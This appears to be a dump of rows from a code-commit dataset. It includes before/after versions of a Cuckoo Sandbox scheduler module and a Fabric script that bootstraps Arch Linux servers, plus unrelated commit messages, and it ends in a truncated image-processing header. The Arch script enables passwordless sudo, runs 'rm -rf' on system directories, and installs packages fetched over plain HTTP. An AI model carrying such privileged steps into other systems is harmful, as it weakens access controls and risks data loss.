CombinedText stringlengths 4 3.42M |
|---|
Set a fixed guid for theme_resources.
Review URL: http://codereview.chromium.org/126058
git-svn-id: dd90618784b6a4b323ea0c23a071cb1c9e6f2ac7@18288 4ff67af0-8c30-449e-8e8b-ad334ec8d88c
|
# Copyright (C) 2010-2013 Cuckoo Sandbox Developers.
# This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org
# See the file 'docs/LICENSE' for copying permission.
import os
import time
import shutil
import logging
import Queue
from threading import Thread, Lock
from lib.cuckoo.common.constants import CUCKOO_ROOT
from lib.cuckoo.common.exceptions import CuckooMachineError, CuckooGuestError, CuckooOperationalError, CuckooCriticalError
from lib.cuckoo.common.objects import File
from lib.cuckoo.common.utils import create_folder
from lib.cuckoo.common.config import Config
from lib.cuckoo.core.database import Database, TASK_COMPLETED, TASK_REPORTED
from lib.cuckoo.core.guest import GuestManager
from lib.cuckoo.core.resultserver import Resultserver
from lib.cuckoo.core.plugins import list_plugins, RunAuxiliary, RunProcessing, RunSignatures, RunReporting
log = logging.getLogger(__name__)
machinery = None
machine_lock = Lock()
class AnalysisManager(Thread):
"""Analysis Manager.
This class handles the full analysis process for a given task. It takes
care of selecting the analysis machine, preparing the configuration and
interacting with the guest agent and analyzer components to launch and
complete the analysis and store, process and report its results.
"""
def __init__(self, task, error_queue):
"""@param task: task object containing the details for the analysis."""
Thread.__init__(self)
Thread.daemon = True
self.task = task
self.errors = error_queue
self.cfg = Config()
self.storage = ""
self.binary = ""
self.machine = None
def init_storage(self):
"""Initialize analysis storage folder."""
self.storage = os.path.join(CUCKOO_ROOT,
"storage",
"analyses",
str(self.task.id))
# If the analysis storage folder already exists, we need to abort the
# analysis or previous results will be overwritten and lost.
if os.path.exists(self.storage):
log.error("Analysis results folder already exists at path \"%s\","
" analysis aborted", self.storage)
return False
# If we're not able to create the analysis storage folder, we have to
# abort the analysis.
try:
create_folder(folder=self.storage)
except CuckooOperationalError:
log.error("Unable to create analysis folder %s", self.storage)
return False
return True
def store_file(self):
"""Store a copy of the file being analyzed."""
if not os.path.exists(self.task.target):
log.error("The file to analyze does not exist at path \"%s\", "
"analysis aborted", self.task.target)
return False
sha256 = File(self.task.target).get_sha256()
self.binary = os.path.join(CUCKOO_ROOT, "storage", "binaries", sha256)
if os.path.exists(self.binary):
log.info("File already exists at \"%s\"", self.binary)
else:
# TODO: do we really need to abort the analysis in case we are not
# able to store a copy of the file?
try:
shutil.copy(self.task.target, self.binary)
except (IOError, shutil.Error) as e:
log.error("Unable to store file from \"%s\" to \"%s\", "
"analysis aborted", self.task.target, self.binary)
return False
try:
new_binary_path = os.path.join(self.storage, "binary")
if hasattr(os, "symlink"):
os.symlink(self.binary, new_binary_path)
else:
shutil.copy(self.binary, new_binary_path)
except (AttributeError, OSError) as e:
log.error("Unable to create symlink/copy from \"%s\" to \"%s\"", self.binary, self.storage)
return True
def acquire_machine(self):
"""Acquire an analysis machine from the pool of available ones."""
machine = None
# Start a loop to acquire the a machine to run the analysis on.
while True:
machine_lock.acquire()
# If the user specified a specific machine ID, a platform to be
# used or machine tags acquire the machine accordingly.
try:
machine = machinery.acquire(machine_id=self.task.machine,
platform=self.task.platform,
tags=self.task.tags)
finally:
machine_lock.release()
# If no machine is available at this moment, wait for one second
# and try again.
if not machine:
log.debug("Task #%d: no machine available yet", self.task.id)
time.sleep(1)
else:
log.info("Task #%d: acquired machine %s (label=%s)", self.task.id, machine.name, machine.label)
break
self.machine = machine
def build_options(self):
"""Generate analysis options.
@return: options dict.
"""
options = {}
options["id"] = self.task.id
options["ip"] = self.machine.resultserver_ip
options["port"] = self.machine.resultserver_port
options["category"] = self.task.category
options["target"] = self.task.target
options["package"] = self.task.package
options["options"] = self.task.options
options["enforce_timeout"] = self.task.enforce_timeout
options["clock"] = self.task.clock
if not self.task.timeout or self.task.timeout == 0:
options["timeout"] = self.cfg.timeouts.default
else:
options["timeout"] = self.task.timeout
if self.task.category == "file":
options["file_name"] = File(self.task.target).get_name()
options["file_type"] = File(self.task.target).get_type()
return options
def launch_analysis(self):
"""Start analysis."""
succeeded = False
log.info("Starting analysis of %s \"%s\" (task=%d)", self.task.category.upper(), self.task.target, self.task.id)
# Initialize the the analysis folders.
if not self.init_storage():
return False
if self.task.category == "file":
# Store a copy of the original file.
if not self.store_file():
return False
# Acquire analysis machine.
try:
self.acquire_machine()
except CuckooOperationalError as e:
log.error("Cannot acquire machine: {0}".format(e))
return False
# Generate the analysis configuration file.
options = self.build_options()
# At this point we can tell the Resultserver about it.
try:
Resultserver().add_task(self.task, self.machine)
except Exception as e:
machinery.release(self.machine.label)
self.errors.put(e)
aux = RunAuxiliary(task=self.task, machine=self.machine)
aux.start()
try:
# Mark the selected analysis machine in the database as started.
guest_log = Database().guest_start(self.task.id,
self.machine.name,
self.machine.label,
machinery.__class__.__name__)
# Start the machine.
machinery.start(self.machine.label)
except CuckooMachineError as e:
log.error(str(e), extra={"task_id" : self.task.id})
# Stop Auxiliary modules.
aux.stop()
return False
else:
try:
# Initialize the guest manager.
guest = GuestManager(self.machine.name, self.machine.ip, self.machine.platform)
# Start the analysis.
guest.start_analysis(options)
except CuckooGuestError as e:
log.error(str(e), extra={"task_id" : self.task.id})
# Stop Auxiliary modules.
aux.stop()
return False
else:
# Wait for analysis completion.
try:
guest.wait_for_completion()
succeeded = True
except CuckooGuestError as e:
log.error(str(e), extra={"task_id" : self.task.id})
succeeded = False
finally:
# Stop Auxiliary modules.
aux.stop()
# Take a memory dump of the machine before shutting it off.
if self.cfg.cuckoo.memory_dump or self.task.memory:
try:
machinery.dump_memory(self.machine.label,
os.path.join(self.storage, "memory.dmp"))
except NotImplementedError:
log.error("The memory dump functionality is not available "
"for current machine manager")
except CuckooMachineError as e:
log.error(e)
try:
# Stop the analysis machine.
machinery.stop(self.machine.label)
except CuckooMachineError as e:
log.warning("Unable to stop machine %s: %s", self.machine.label, e)
# Market the machine in the database as stopped.
Database().guest_stop(guest_log)
try:
# Release the analysis machine.
machinery.release(self.machine.label)
except CuckooMachineError as e:
log.error("Unable to release machine %s, reason %s. "
"You might need to restore it manually", self.machine.label, e)
# after all this, we can make the Resultserver forget about it
Resultserver().del_task(self.task, self.machine)
return succeeded
def process_results(self):
"""Process the analysis results and generate the enabled reports."""
results = RunProcessing(task_id=self.task.id).run()
RunSignatures(results=results).run()
RunReporting(task_id=self.task.id, results=results).run()
for proc in results["behavior"]["processes"]:
log.debug("ParseProcessLog instance for %d (%s) parsed its log %d times.",
proc["process_id"], proc["process_name"], proc["calls"].parsecount)
# If the target is a file and the user enabled the option,
# delete the original copy.
if self.task.category == "file" and self.cfg.cuckoo.delete_original:
try:
os.remove(self.task.target)
except OSError as e:
log.error("Unable to delete original file at path \"%s\": %s", self.task.target, e)
log.info("Task #%d: reports generation completed (path=%s)", self.task.id, self.storage)
return True
def run(self):
"""Run manager thread."""
success = self.launch_analysis()
Database().set_status(self.task.id, TASK_COMPLETED)
log.debug("Released database task #%d with status %s", self.task.id, success)
self.process_results()
Database().set_status(self.task.id, TASK_REPORTED)
log.info("Task #%d: analysis procedure completed", self.task.id)
class Scheduler:
"""Tasks Scheduler.
This class is responsible for the main execution loop of the tool. It
prepares the analysis machines and keep waiting and loading for new
analysis tasks.
Whenever a new task is available, it launches AnalysisManager which will
take care of running the full analysis process and operating with the
assigned analysis machine.
"""
def __init__(self):
self.running = True
self.cfg = Config()
self.db = Database()
def initialize(self):
"""Initialize the machine manager."""
global machinery
machinery_name = self.cfg.cuckoo.machine_manager
log.info("Using \"%s\" machine manager", machinery_name)
# Get registered class name. Only one machine manager is imported,
# therefore there should be only one class in the list.
plugin = list_plugins("machinery")[0]
# Initialize the machine manager.
machinery = plugin()
# Find its configuration file.
conf = os.path.join(CUCKOO_ROOT, "conf", "%s.conf" % machinery_name)
if not os.path.exists(conf):
raise CuckooCriticalError("The configuration file for machine "
"manager \"{0}\" does not exist at path: "
"{1}".format(machinery_name, conf))
# Provide a dictionary with the configuration options to the
# machine manager instance.
machinery.set_options(Config(conf))
# Initialize the machine manager.
machinery.initialize(machinery_name)
# At this point all the available machines should have been identified
# and added to the list. If none were found, Cuckoo needs to abort the
# execution.
if len(machinery.machines()) == 0:
raise CuckooCriticalError("No machines available")
else:
log.info("Loaded %s machine/s", len(machinery.machines()))
def stop(self):
"""Stop scheduler."""
self.running = False
# Shutdown machine manager (used to kill machines that still alive).
machinery.shutdown()
def start(self):
"""Start scheduler."""
self.initialize()
log.info("Waiting for analysis tasks...")
# Message queue with threads to transmit exceptions (used as IPC).
errors = Queue.Queue()
# This loop runs forever.
while self.running:
time.sleep(1)
# If no machines are available, it's pointless to fetch for
# pending tasks. Loop over.
if machinery.availables() == 0:
continue
# Fetch a pending analysis task.
task = self.db.fetch()
if task:
log.debug("Processing task #%s", task.id)
# Initialize the analysis manager.
analysis = AnalysisManager(task, errors)
# Start.
analysis.start()
# Deal with errors.
try:
error = errors.get(block=False)
except Queue.Empty:
pass
else:
raise error
Cleanup
# Copyright (C) 2010-2013 Cuckoo Sandbox Developers.
# This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org
# See the file 'docs/LICENSE' for copying permission.
import os
import time
import shutil
import logging
import Queue
from threading import Thread, Lock
from lib.cuckoo.common.constants import CUCKOO_ROOT
from lib.cuckoo.common.exceptions import CuckooMachineError, CuckooGuestError, CuckooOperationalError, CuckooCriticalError
from lib.cuckoo.common.objects import File
from lib.cuckoo.common.utils import create_folder
from lib.cuckoo.common.config import Config
from lib.cuckoo.core.database import Database, TASK_COMPLETED, TASK_REPORTED
from lib.cuckoo.core.guest import GuestManager
from lib.cuckoo.core.resultserver import Resultserver
from lib.cuckoo.core.plugins import list_plugins, RunAuxiliary, RunProcessing, RunSignatures, RunReporting
log = logging.getLogger(__name__)
machinery = None
machine_lock = Lock()
class AnalysisManager(Thread):
"""Analysis Manager.
This class handles the full analysis process for a given task. It takes
care of selecting the analysis machine, preparing the configuration and
interacting with the guest agent and analyzer components to launch and
complete the analysis and store, process and report its results.
"""
def __init__(self, task, error_queue):
"""@param task: task object containing the details for the analysis."""
Thread.__init__(self)
Thread.daemon = True
self.task = task
self.errors = error_queue
self.cfg = Config()
self.storage = ""
self.binary = ""
self.machine = None
def init_storage(self):
"""Initialize analysis storage folder."""
self.storage = os.path.join(CUCKOO_ROOT,
"storage",
"analyses",
str(self.task.id))
# If the analysis storage folder already exists, we need to abort the
# analysis or previous results will be overwritten and lost.
if os.path.exists(self.storage):
log.error("Analysis results folder already exists at path \"%s\","
" analysis aborted", self.storage)
return False
# If we're not able to create the analysis storage folder, we have to
# abort the analysis.
try:
create_folder(folder=self.storage)
except CuckooOperationalError:
log.error("Unable to create analysis folder %s", self.storage)
return False
return True
def store_file(self):
"""Store a copy of the file being analyzed."""
if not os.path.exists(self.task.target):
log.error("The file to analyze does not exist at path \"%s\", "
"analysis aborted", self.task.target)
return False
sha256 = File(self.task.target).get_sha256()
self.binary = os.path.join(CUCKOO_ROOT, "storage", "binaries", sha256)
if os.path.exists(self.binary):
log.info("File already exists at \"%s\"", self.binary)
else:
# TODO: do we really need to abort the analysis in case we are not
# able to store a copy of the file?
try:
shutil.copy(self.task.target, self.binary)
except (IOError, shutil.Error) as e:
log.error("Unable to store file from \"%s\" to \"%s\", "
"analysis aborted", self.task.target, self.binary)
return False
try:
new_binary_path = os.path.join(self.storage, "binary")
if hasattr(os, "symlink"):
os.symlink(self.binary, new_binary_path)
else:
shutil.copy(self.binary, new_binary_path)
except (AttributeError, OSError) as e:
log.error("Unable to create symlink/copy from \"%s\" to \"%s\"", self.binary, self.storage)
return True
def acquire_machine(self):
"""Acquire an analysis machine from the pool of available ones."""
machine = None
# Start a loop to acquire the a machine to run the analysis on.
while True:
machine_lock.acquire()
# If the user specified a specific machine ID, a platform to be
# used or machine tags acquire the machine accordingly.
try:
machine = machinery.acquire(machine_id=self.task.machine,
platform=self.task.platform,
tags=self.task.tags)
finally:
machine_lock.release()
# If no machine is available at this moment, wait for one second
# and try again.
if not machine:
log.debug("Task #%d: no machine available yet", self.task.id)
time.sleep(1)
else:
log.info("Task #%d: acquired machine %s (label=%s)", self.task.id, machine.name, machine.label)
break
self.machine = machine
def build_options(self):
"""Generate analysis options.
@return: options dict.
"""
options = {}
options["id"] = self.task.id
options["ip"] = self.machine.resultserver_ip
options["port"] = self.machine.resultserver_port
options["category"] = self.task.category
options["target"] = self.task.target
options["package"] = self.task.package
options["options"] = self.task.options
options["enforce_timeout"] = self.task.enforce_timeout
options["clock"] = self.task.clock
if not self.task.timeout or self.task.timeout == 0:
options["timeout"] = self.cfg.timeouts.default
else:
options["timeout"] = self.task.timeout
if self.task.category == "file":
options["file_name"] = File(self.task.target).get_name()
options["file_type"] = File(self.task.target).get_type()
return options
def launch_analysis(self):
"""Start analysis."""
succeeded = False
log.info("Starting analysis of %s \"%s\" (task=%d)", self.task.category.upper(), self.task.target, self.task.id)
# Initialize the the analysis folders.
if not self.init_storage():
return False
if self.task.category == "file":
# Store a copy of the original file.
if not self.store_file():
return False
# Acquire analysis machine.
try:
self.acquire_machine()
except CuckooOperationalError as e:
log.error("Cannot acquire machine: {0}".format(e))
return False
# Generate the analysis configuration file.
options = self.build_options()
# At this point we can tell the Resultserver about it.
try:
Resultserver().add_task(self.task, self.machine)
except Exception as e:
machinery.release(self.machine.label)
self.errors.put(e)
aux = RunAuxiliary(task=self.task, machine=self.machine)
aux.start()
try:
# Mark the selected analysis machine in the database as started.
guest_log = Database().guest_start(self.task.id,
self.machine.name,
self.machine.label,
machinery.__class__.__name__)
# Start the machine.
machinery.start(self.machine.label)
except CuckooMachineError as e:
log.error(str(e), extra={"task_id": self.task.id})
# Stop Auxiliary modules.
aux.stop()
return False
else:
try:
# Initialize the guest manager.
guest = GuestManager(self.machine.name, self.machine.ip, self.machine.platform)
# Start the analysis.
guest.start_analysis(options)
except CuckooGuestError as e:
log.error(str(e), extra={"task_id": self.task.id})
# Stop Auxiliary modules.
aux.stop()
return False
else:
# Wait for analysis completion.
try:
guest.wait_for_completion()
succeeded = True
except CuckooGuestError as e:
log.error(str(e), extra={"task_id": self.task.id})
succeeded = False
finally:
# Stop Auxiliary modules.
aux.stop()
# Take a memory dump of the machine before shutting it off.
if self.cfg.cuckoo.memory_dump or self.task.memory:
try:
machinery.dump_memory(self.machine.label,
os.path.join(self.storage, "memory.dmp"))
except NotImplementedError:
log.error("The memory dump functionality is not available "
"for current machine manager")
except CuckooMachineError as e:
log.error(e)
try:
# Stop the analysis machine.
machinery.stop(self.machine.label)
except CuckooMachineError as e:
log.warning("Unable to stop machine %s: %s", self.machine.label, e)
# Market the machine in the database as stopped.
Database().guest_stop(guest_log)
try:
# Release the analysis machine.
machinery.release(self.machine.label)
except CuckooMachineError as e:
log.error("Unable to release machine %s, reason %s. "
"You might need to restore it manually", self.machine.label, e)
# after all this, we can make the Resultserver forget about it
Resultserver().del_task(self.task, self.machine)
return succeeded
def process_results(self):
"""Process the analysis results and generate the enabled reports."""
results = RunProcessing(task_id=self.task.id).run()
RunSignatures(results=results).run()
RunReporting(task_id=self.task.id, results=results).run()
for proc in results["behavior"]["processes"]:
log.debug("ParseProcessLog instance for %d (%s) parsed its log %d times.",
proc["process_id"], proc["process_name"], proc["calls"].parsecount)
# If the target is a file and the user enabled the option,
# delete the original copy.
if self.task.category == "file" and self.cfg.cuckoo.delete_original:
try:
os.remove(self.task.target)
except OSError as e:
log.error("Unable to delete original file at path \"%s\": %s", self.task.target, e)
log.info("Task #%d: reports generation completed (path=%s)", self.task.id, self.storage)
return True
def run(self):
"""Run manager thread."""
success = self.launch_analysis()
Database().set_status(self.task.id, TASK_COMPLETED)
log.debug("Released database task #%d with status %s", self.task.id, success)
self.process_results()
Database().set_status(self.task.id, TASK_REPORTED)
log.info("Task #%d: analysis procedure completed", self.task.id)
class Scheduler:
"""Tasks Scheduler.
This class is responsible for the main execution loop of the tool. It
prepares the analysis machines and keep waiting and loading for new
analysis tasks.
Whenever a new task is available, it launches AnalysisManager which will
take care of running the full analysis process and operating with the
assigned analysis machine.
"""
def __init__(self):
self.running = True
self.cfg = Config()
self.db = Database()
def initialize(self):
"""Initialize the machine manager."""
global machinery
machinery_name = self.cfg.cuckoo.machine_manager
log.info("Using \"%s\" machine manager", machinery_name)
# Get registered class name. Only one machine manager is imported,
# therefore there should be only one class in the list.
plugin = list_plugins("machinery")[0]
# Initialize the machine manager.
machinery = plugin()
# Find its configuration file.
conf = os.path.join(CUCKOO_ROOT, "conf", "%s.conf" % machinery_name)
if not os.path.exists(conf):
raise CuckooCriticalError("The configuration file for machine "
"manager \"{0}\" does not exist at path: "
"{1}".format(machinery_name, conf))
# Provide a dictionary with the configuration options to the
# machine manager instance.
machinery.set_options(Config(conf))
# Initialize the machine manager.
machinery.initialize(machinery_name)
# At this point all the available machines should have been identified
# and added to the list. If none were found, Cuckoo needs to abort the
# execution.
if len(machinery.machines()) == 0:
raise CuckooCriticalError("No machines available")
else:
log.info("Loaded %s machine/s", len(machinery.machines()))
def stop(self):
"""Stop scheduler."""
self.running = False
# Shutdown machine manager (used to kill machines that still alive).
machinery.shutdown()
def start(self):
"""Start scheduler."""
self.initialize()
log.info("Waiting for analysis tasks...")
# Message queue with threads to transmit exceptions (used as IPC).
errors = Queue.Queue()
# This loop runs forever.
while self.running:
time.sleep(1)
# If no machines are available, it's pointless to fetch for
# pending tasks. Loop over.
if machinery.availables() == 0:
continue
# Fetch a pending analysis task.
task = self.db.fetch()
if task:
log.debug("Processing task #%s", task.id)
# Initialize the analysis manager.
analysis = AnalysisManager(task, errors)
# Start.
analysis.start()
# Deal with errors.
try:
error = errors.get(block=False)
except Queue.Empty:
pass
else:
raise error
|
REF: temporarily setting continuous labels option because it is not compile on linux. See issue #415
|
import time
from fabric.api import env, run, sudo
from fabric.context_managers import settings as fabric_settings
from fabric.contrib.files import append, sed, uncomment
from fabric.operations import reboot
DISTRO = "ARCH_201110"
SALT_INSTALLERS = ["aur", "aur-git"]
def bootstrap():
"""
Bootstrap Arch Linux.
Only the bare essentials, the configurator will take care of the rest.
"""
# manually set hostname so salt finds proper hostname via socket.gethostname()
for server in env.bootmachine_servers:
if server.public_ip == env.host:
sed("/etc/hosts", "# End of file", "")
append("/etc/hosts", "{0} {1}".format(server.public_ip, server.name))
append("/etc/hosts", "{0} {1}".format(server.private_ip, server.name))
append("/etc/hosts", "\n# End of file")
# pre upgrade maintenance (updating filesystem and tzdata before pacman)
run("pacman -Syy")
run("rm -rf /var/run /var/lock")
run("printf 'n\nY\n' | pacman -S --force filesystem")
run("printf 'n\nY\n' | pacman -S tzdata")
run("printf 'n\nY\n' | pacman -S haveged")
# https://www.archlinux.org/news/the-lib-directory-becomes-a-symlink/
run("pacman --noconfirm -U http://pkgbuild.com/~allan/glibc-2.16.0-1-x86_64.pkg.tar.xz")
# upgrade pacman
run("pacman --noconfirm -S pacman")
# haveged generates the entropy necessary for making a pacman gpg key
run("rc.d start haveged", pty=False)
run("pacman-key --init")
run("rc.d stop haveged", pty=False)
run("pacman --noconfirm -Rns haveged")
# sign the master pacman keys https://wiki.archlinux.org/index.php/Pacman-key#Master_keys
# Note: Level 3 'marginal trust' is suggested, but had to trust level of 4 because of an unknown error.
run("for key in 6AC6A4C2 824B18E8 4C7EA887 FFF979E7 CDFD6BB0; \
do pacman-key --recv-keys $key; pacman-key --lsign-key $key; \
printf 'trust\n4\nquit\n' | gpg --homedir /etc/pacman.d/gnupg/ --no-permission-warning --command-fd 0 --edit-key $key; \
done")
# ARGH!!! printf won't work here!!!
#run("printf 'Y\nY\nY\nY\nY\nY\nY\nY\n' | pacman-key --populate archlinux", shell=False)
# configure new kernel and reboot (before system upgrade!!)
run("printf 'y\ny\nY\nY\nY\nY\nY\nY\nY\nY\nY\n' | pacman --force -S linux mkinitcpio udev") # key accepting does work here
sed("/etc/mkinitcpio.conf", "xen-", "xen_") # patch: https://projects.archlinux.org/mkinitcpio.git/commit/?id=5b99f78331f567cc1442460efc054b72c45306a6
sed("/etc/mkinitcpio.conf", "usbinput", "usbinput fsck")
run("mkinitcpio -p linux")
reboot()
# full system upgrade and installtion of a few essential packages and another reboot for good measure
run("pacman --noconfirm -Syyu")
run("pacman --noconfirm -S base-devel")
run("pacman --noconfirm -S curl git rsync")
reboot()
# install yaourt
append("/etc/pacman.conf", "\n[archlinuxfr]\nServer = http://repo.archlinux.fr/$arch", use_sudo=True)
run("pacman -Syy")
run("pacman --noconfirm -S yaourt")
# create a user, named 'aur', to safely install packages under fakeroot
# uid and gid values auto increment from 1000
# to prevent conficts set the 'aur' user's gid and uid to 902
run("groupadd -g 902 aur && useradd -u 902 -g 902 -G wheel aur")
uncomment("/etc/sudoers", "wheel.*NOPASSWD")
# tweak sshd_config (before reboot so it is restarted!) so fabric can sftp with contrib.files.put, see:
# http://stackoverflow.com/questions/10221839/cant-use-fabric-put-is-there-any-server-configuration-needed
sed("/etc/ssh/sshd_config", "Subsystem sftp /usr/lib/openssh/sftp-server", "Subsystem sftp internal-sftp")
run("rc.d restart sshd", pty=False)
def install_salt(installer="aur"):
"""
Install salt from the AUR.
"""
# TODO: figure out how to run yaourt under fakeroot
# TODO: support installation or freezing at an older version
if installer == "aur":
sudo("yaourt --noconfirm -S salt", user="aur")
elif installer == "aur-git":
sudo("yaourt --noconfirm -S salt-git", user="aur")
else:
raise NotImplementedError()
def start_salt():
"""
See: http://salt.readthedocs.org/en/latest/topics/installation/arch.html
Upload the bootmachine's bundled salt-states.
Launch the salt-master daemon on the saltmaster server.
Launch a salt-minion daemon on all servers, including the saltmaster.
"""
run("cp /etc/salt/minion.template /etc/salt/minion")
if env.host == env.master_server.public_ip:
run("cp /etc/salt/master.template /etc/salt/master")
sed("/etc/rc.conf", "crond sshd", "crond sshd iptables @salt-master @salt-minion")
run("rc.d start salt-master", pty=False)
sed("/etc/salt/minion", "#master: salt", "master: localhost")
else:
sed("/etc/rc.conf", "crond sshd", "crond sshd iptables @salt-minion")
sed("/etc/salt/minion", "#master: salt", "master: {hostname}".format(
hostname=env.master_server.name))
run("rc.d start salt-minion", pty=False)
def restart_salt():
"""
Restarts salt master and/or minions.
"""
with fabric_settings(warn_only=True):
if env.host == env.master_server.public_ip:
sudo("rc.d restart salt-master", pty=False)
time.sleep(3)
sudo("rc.d restart salt-minion", pty=False)
else:
sudo("rc.d restart salt-minion", pty=False)
rackspace/archlinux fixes for glibc, netcfg, and more.
import time
from fabric.api import env, run, sudo
from fabric.context_managers import settings as fabric_settings
from fabric.contrib.files import append, sed, uncomment
from fabric.operations import reboot
DISTRO = "ARCH_201110"
SALT_INSTALLERS = ["aur", "aur-git"]
def bootstrap():
"""
Bootstrap Arch Linux.
Only the bare essentials, the configurator will take care of the rest.
"""
# manually set hostname so salt finds it via socket.gethostname()
for server in env.bootmachine_servers:
if server.public_ip == env.host:
sed("/etc/hosts", "# End of file", "")
append("/etc/hosts", "{0} {1}".format(server.public_ip, server.name))
append("/etc/hosts", "{0} {1}".format(server.private_ip, server.name))
append("/etc/hosts", "\n# End of file")
# pre upgrade maintenance (updating filesystem and tzdata before pacman)
run("pacman -Syy")
run("rm -rf /var/run /var/lock")
run("printf 'n\nY\n' | pacman -S --force filesystem")
run("printf 'n\nY\n' | pacman -S tzdata")
# haveged generates the entropy necessary for making the pacman gpg key
run("printf 'n\nY\n' | pacman -S haveged")
run("rc.d start haveged", pty=False)
# upgrade everything except glibc
# https://www.archlinux.org/news/the-lib-directory-becomes-a-symlink/
run("pacman --noconfirm -U http://pkgbuild.com/~allan/glibc-2.16.0-1-x86_64.pkg.tar.xz")
run("rm /etc/profile.d/locale.sh")
run("printf 'n\nY\nY\nY\nY\nY\nY\nY\nY\nY\nY\n' | pacman -Su --ignore glibc")
# configure pacman
run("rc.d restart haveged")
run("pacman-key --init")
run("rc.d stop haveged", pty=False)
run("pacman --noconfirm -Rns haveged")
# sign the master pacman keys https://wiki.archlinux.org/index.php/Pacman-key#Master_keys
# Note: Level 3 'marginal trust' is suggested, but had to trust level of 4 because of an unknown error.
run("for key in 6AC6A4C2 824B18E8 4C7EA887 FFF979E7 CDFD6BB0; \
do pacman-key --recv-keys $key; pacman-key --lsign-key $key; \
printf 'trust\n4\nquit\n' | gpg --homedir /etc/pacman.d/gnupg/ --no-permission-warning --command-fd 0 --edit-key $key; \
done")
# ARGH!!! printf won't work here!!!
#run("printf 'Y\nY\nY\nY\nY\nY\nY\nY\n' | pacman-key --populate archlinux", shell=False)
# install essential packages
run("pacman --noconfirm -S base-devel")
run("pacman --noconfirm -S curl git rsync")
append("/etc/pacman.conf", "\n[archlinuxfr]\nServer = http://repo.archlinux.fr/$arch", use_sudo=True)
run("pacman -Syy")
run("pacman --noconfirm -S yaourt")
# create a user, named 'aur', to safely install AUR packages under fakeroot
# uid and gid values auto increment from 1000
# to prevent conficts set the 'aur' user's gid and uid to 902
run("groupadd -g 902 aur && useradd -u 902 -g 902 -G wheel aur")
uncomment("/etc/sudoers", "wheel.*NOPASSWD")
# still dealing with glibc crap
run("rm -rf /lib/modules")
run("pacman --noconfirm -Rns xe-guest-utilities kernel26-xen")
sudo("yaourt --noconfirm -S xe-guest-utilities", user="aur")
# finally we can upgrade glibc and run a successful full system upgrade
run("pacman --noconfirm -Su")
# tweak sshd_config (before reboot so it is restarted!) so fabric can sftp with contrib.files.put, see:
# http://stackoverflow.com/questions/10221839/cant-use-fabric-put-is-there-any-server-configuration-needed
sed("/etc/ssh/sshd_config", "Subsystem sftp /usr/lib/openssh/sftp-server", "Subsystem sftp internal-sftp")
run("rc.d restart sshd", pty=False)
# force netcfg to automatically connect to eth0 on reboot
run("sed -i.bak -r -e 's/NETWORKS=\(last\)/NETWORKS=\(eth0\)/g' /etc/conf.d/netcfg")
# configure new kernel and reboot
sed("/etc/mkinitcpio.conf", "xen-", "xen_") # see: https://projects.archlinux.org/mkinitcpio.git/commit/?id=5b99f78331f567cc1442460efc054b72c45306a6
sed("/etc/mkinitcpio.conf", "usbinput", "usbinput fsck")
run("mkinitcpio -p linux")
reboot()
def install_salt(installer="aur"):
"""
Install salt from the AUR.
"""
if installer == "aur":
sudo("yaourt --noconfirm -S salt", user="aur")
elif installer == "aur-git":
sudo("yaourt --noconfirm -S salt-git", user="aur")
else:
raise NotImplementedError()
def start_salt():
"""
See: http://salt.readthedocs.org/en/latest/topics/installation/arch.html
Upload the bootmachine's bundled salt-states.
Launch the salt-master daemon on the saltmaster server.
Launch a salt-minion daemon on all servers, including the saltmaster.
"""
run("cp /etc/salt/minion.template /etc/salt/minion")
if env.host == env.master_server.public_ip:
run("cp /etc/salt/master.template /etc/salt/master")
sed("/etc/rc.conf", "crond sshd", "crond sshd iptables @salt-master @salt-minion")
run("rc.d start salt-master", pty=False)
sed("/etc/salt/minion", "#master: salt", "master: localhost")
else:
sed("/etc/rc.conf", "crond sshd", "crond sshd iptables @salt-minion")
sed("/etc/salt/minion", "#master: salt", "master: {hostname}".format(
hostname=env.master_server.name))
run("rc.d start salt-minion", pty=False)
def restart_salt():
"""
Restarts salt master and/or minions.
"""
with fabric_settings(warn_only=True):
if env.host == env.master_server.public_ip:
sudo("rc.d restart salt-master", pty=False)
time.sleep(3)
sudo("rc.d restart salt-minion", pty=False)
else:
sudo("rc.d restart salt-minion", pty=False)
|
#!/usr/bin/env python
## @package sct_straighten_spinalcord
#
# - from spinal cord centerline (as nifti format), estimate deformation field with ANTS.
#
#
# Description about how the function works:
# This program takes as input an anatomic image and the centerline or segmentation of its spinal cord (that you can get
# using sct_get_centerline.py or sct_segmentation_propagation) and returns the anatomic image where the spinal
# cord was straightened.
#
#
# USAGE
# ---------------------------------------------------------------------------------------
# sct_straighten_spinalcord.py -i <data> -c <centerline>
#
# MANDATORY ARGUMENTS
# ---------------------------------------------------------------------------------------
# -i input volume.
# -c centerline (generated with sct_get_centerline).
#
# OPTIONAL ARGUMENTS
# ---------------------------------------------------------------------------------------
#
# -f 'polynomial' or 'splines' fitting default is 'splines'
#
# EXAMPLES
# ---------------------------------------------------------------------------------------
# sct_straighten_spinalcord.py -i t2.nii.gz -c centerline.nii.gz
#
#
# DEPENDENCIES
# ---------------------------------------------------------------------------------------
# EXTERNAL PYTHON PACKAGES
# - nibabel: <http://nipy.sourceforge.net/nibabel/>
# - numpy: <http://www.numpy.org>
# - sympy : <http://sympy.org/fr/index.html>
# EXTERNAL SOFTWARE
# - FSL: <http://fsl.fmrib.ox.ac.uk/fsl/>
# - ANTS
#
#
# ---------------------------------------------------------------------------------------
# Copyright (c) 2013 NeuroPoly, Polytechnique Montreal <www.neuro.polymtl.ca>
# Authors: Julien Cohen-Adad, Geoffrey Leveque, Julien Touati
# Modified: 2014-07-05 by jcohen
#
# License: see the LICENSE.TXT
#=======================================================================================================================
# TODO: fix bug of label creation when using splines (2014-06-05: error with data from Falk with small FOV along z)
# TODO: generate cross at both edge (top and bottom) and populate in between --> this will ensure better quality of the warping field.
# TODO: check if there is an overlap of labels, in case of high curvature and high density of cross along z.
# TODO: convert gap definition to mm (more intuitive than voxel)
# 2014-06-06: corrected bug related to small FOV volumes Solution: reduced spline order (3), computation of a lot of point (1000)
## Create a structure to pass important user parameters to the main function
class param:
## The constructor
def __init__(self):
self.debug = 0
self.deg_poly = 10 # maximum degree of polynomial function for fitting centerline.
self.gapxy = 20 # size of cross in x and y direction for the landmarks
self.gapz = 15 # gap between landmarks along z
self.padding = 30 # pad input volume in order to deal with the fact that some landmarks might be outside the FOV due to the curvature of the spinal cord
self.fitting_method = 'splines' # splines | polynomial
self.interpolation_warp = 'spline'
self.remove_temp_files = 1 # remove temporary files
self.verbose = 1
# check if needed Python libraries are already installed or not
import os
import getopt
